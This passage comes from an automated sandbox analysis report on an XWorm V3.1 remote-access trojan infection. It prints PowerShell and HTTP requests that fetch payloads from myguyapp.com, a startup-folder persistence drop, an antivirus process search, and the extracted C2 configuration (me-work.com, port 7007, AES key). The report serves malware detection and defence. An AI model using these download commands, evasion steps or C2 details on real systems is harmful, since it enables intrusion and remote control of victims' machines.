-Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4500, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Search for Antivirus process
              Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 1276, ProcessName: findstr.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T01:35:52.437012+010028528701Malware Command and Control Activity Detected193.26.115.217007192.168.2.449994TCP
              2024-12-16T01:36:22.453200+010028528701Malware Command and Control Activity Detected193.26.115.217007192.168.2.449994TCP
              2024-12-16T01:36:52.453777+010028528701Malware Command and Control Activity Detected193.26.115.217007192.168.2.449994TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T01:35:52.437012+010028528741Malware Command and Control Activity Detected193.26.115.217007192.168.2.449994TCP
              2024-12-16T01:36:22.453200+010028528741Malware Command and Control Activity Detected193.26.115.217007192.168.2.449994TCP
              2024-12-16T01:36:52.453777+010028528741Malware Command and Control Activity Detected193.26.115.217007192.168.2.449994TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T01:35:55.067781+010028559241Malware Command and Control Activity Detected192.168.2.449994193.26.115.217007TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://myguyapp.com/msword.zipAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Multi AV Scanner detection for domain / URL
              Source: me-work.comVirustotal: Detection: 12%Perma Link
              Source: https://myguyapp.com/Virustotal: Detection: 5%Perma Link
              Source: https://myguyapp.com/msword.zipVirustotal: Detection: 18%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Sample uses string decryption to hide its real strings
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: me-work.com
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: 7007
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: <123456789>
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: <Xwormmm>
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: USB.exe
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004062D5 FindFirstFileW,FindClose,15_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00402E18 FindFirstFileW,15_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01044005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104494A GetFileAttributesW,FindFirstFileW,FindClose,28_2_0104494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01043CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01043CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104C2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104CD14 FindFirstFileW,FindClose,28_2_0104CD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,28_2_0104CD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F5D8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00894005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00894005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089494A GetFileAttributesW,FindFirstFileW,FindClose,36_2_0089494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,36_2_0089CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089CD14 FindFirstFileW,FindClose,36_2_0089CD14
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0089FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00893CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00893CE2
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.26.115.21:7007 -> 192.168.2.4:49994
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.26.115.21:7007 -> 192.168.2.4:49994
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49994 -> 193.26.115.21:7007
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: me-work.com
              Source: global trafficTCP traffic: 192.168.2.4:49994 -> 193.26.115.21:7007
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /c.bat HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010529BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,28_2_010529BA
              Source: global trafficHTTP traffic detected: GET /c.bat HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: myguyapp.com
              Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
              Source: global trafficDNS traffic detected: DNS query: dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
              Source: global trafficDNS traffic detected: DNS query: me-work.com
              Source: msword.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: msword.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: msword.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: msword.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: msword.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: msword.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: msword.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: msword.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: msword.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: msword.exe, 0000000F.00000000.2176944096.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.12.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: msword.exe.12.drString found in binary or memory: http://ocsp.digicert.com0
              Source: msword.exe.12.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: msword.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: msword.exe.12.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: RegAsm.exe, 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000024.00000002.2248424669.00000000008F9000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 00000026.00000000.2341454092.0000000000979000.00000002.00000001.01000000.00000011.sdmp, Carter.pif.19.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: msword.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.drString found in binary or memory: http://x1.i.lencr.org/
              Source: mshta.exe, 00000000.00000003.2180407908.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191819008.000000000A6A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178648980.000000000A69F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/
              Source: mshta.exe, 00000000.00000002.2189976886.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2190601115.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2180004393.00000000031B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178648980.000000000A72B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182996805.000000000A667000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191626498.000000000645A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031F3000.00000004.00000020.00020000.00000000.sdmp, c2.htaString found in binary or memory: https://myguyapp.com/c.bat
              Source: mshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/c.batA
              Source: mshta.exe, 00000000.00000003.2182996805.000000000A667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/c.batO
              Source: mshta.exe, 00000000.00000002.2190782363.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/c.batQ;
              Source: mshta.exe, 00000000.00000003.2182501975.0000000003151000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2190431701.0000000003152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/c.batta
              Source: RegAsm.exe, 00000028.00000002.4145039589.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4153020954.0000000005660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, c[1].bat.0.drString found in binary or memory: https://myguyapp.com/f.pdf
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdf#
              Source: cmd.exe, 0000001E.00000002.2218183562.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdf&
              Source: Carter.pif, 0000001C.00000002.4142975569.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdf6
              Source: RegAsm.exe, 00000028.00000002.4145039589.0000000000DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM
              Source: tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROF
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfx
              Source: mshta.exe, 00000000.00000003.2182970389.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191819008.000000000A712000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2241478778.0000000002300000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2240642451.000000000079E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2240497992.0000000000730000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198754088.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198184254.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198902902.00000000031FD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2199134054.0000000003480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198290497.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198352988.00000000031FC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2204137637.000000000283E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2202857947.000000000283A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2203915215.0000000002808000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2203305366.000000000283A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2203428301.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142087918.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142975569.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2259638812.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2259655331.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipJ
              Source: tasklist.exe, 00000015.00000003.2198184254.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198325078.0000000003201000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2199134054.0000000003480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198974605.0000000003202000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198290497.00000000031F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2
              Source: msword.exe, 0000000F.00000002.2240642451.0000000000824000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000003.2239272884.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=httpd
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPR
              Source: Carter.pif, 0000001C.00000002.4142087918.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyappc
              Source: mshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/r
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.globalsign.com/rea
